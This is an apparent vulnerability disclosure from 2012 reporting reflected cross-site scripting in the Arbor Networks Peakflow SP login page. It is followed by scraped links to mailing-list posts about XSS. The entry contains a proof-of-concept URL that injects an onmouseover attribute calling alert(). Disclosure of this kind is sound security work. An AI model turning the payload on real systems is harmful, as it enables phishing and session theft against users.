Arbor Networks Peakflow SP web interface XSS
# Exploit Title: Arbor Networks Peakflow SP XSS
# Date: 03 April 2012
# Software Link: www.arbornetworks.com/peakflowsp
================================================================
- Login Page vulnerable to cross site scripting ("XSS")
https://127.0.0.2/index/"onmouseover="alert(666);
================================================================
Relevant Pages
- [Full-disclosure] WASC-Articles: DOM Based Cross Site Scripting or XSS of the Third Kind: A look at
... The Web Application Security Consortium is proud to present 'DOM Based Cross Site Scripting or XSS of ... A look at an overlooked flavor of XSS ' written by Amit Klein. ... focuses on a little known variant of Cross Site Scripting which attacks a user's client without ... current issues, innovative defense techniques, etc. ... (Full-Disclosure) - WASC-Articles: DOM Based Cross Site Scripting or XSS of the Third Kind: A look at an overlooked flav
... The Web Application Security Consortium is proud to present 'DOM Based Cross Site Scripting or XSS of ... A look at an overlooked flavor of XSS ' written by Amit Klein. ... focuses on a little known variant of Cross Site Scripting which attacks a user's client without ... current issues, innovative defense techniques, etc. ... (Bugtraq) - WASC-Articles: DOM Based Cross Site Scripting or XSS of the Third Kind: A look at an overlooked flav
... The Web Application Security Consortium is proud to present 'DOM Based Cross Site Scripting or XSS of ... A look at an overlooked flavor of XSS ' written by Amit Klein. ... focuses on a little known variant of Cross Site Scripting which attacks a user's client without ... current issues, innovative defense techniques, etc. ... (Pen-Test) - Re: [Full-Disclosure] Cross-Site Scripting - an industry-wide problem
... funny because xss can be used in PHISHING attacks. ... spoofing the original content (a login page) and capture username/password ... > does not mean XSS is not a security issue. ... (Full-Disclosure) - [Full-disclosure] pmwiki: persistent cross site scripting (XSS), CVE-2010-1481
... persistent cross site scripting (XSS), ... The table feature of pmwiki is vulnerable to persistent cross site scripting ... This vulnerability was discovered by Hanno Boeck, http://www.hboeck.de, of ... (Full-Disclosure) |
|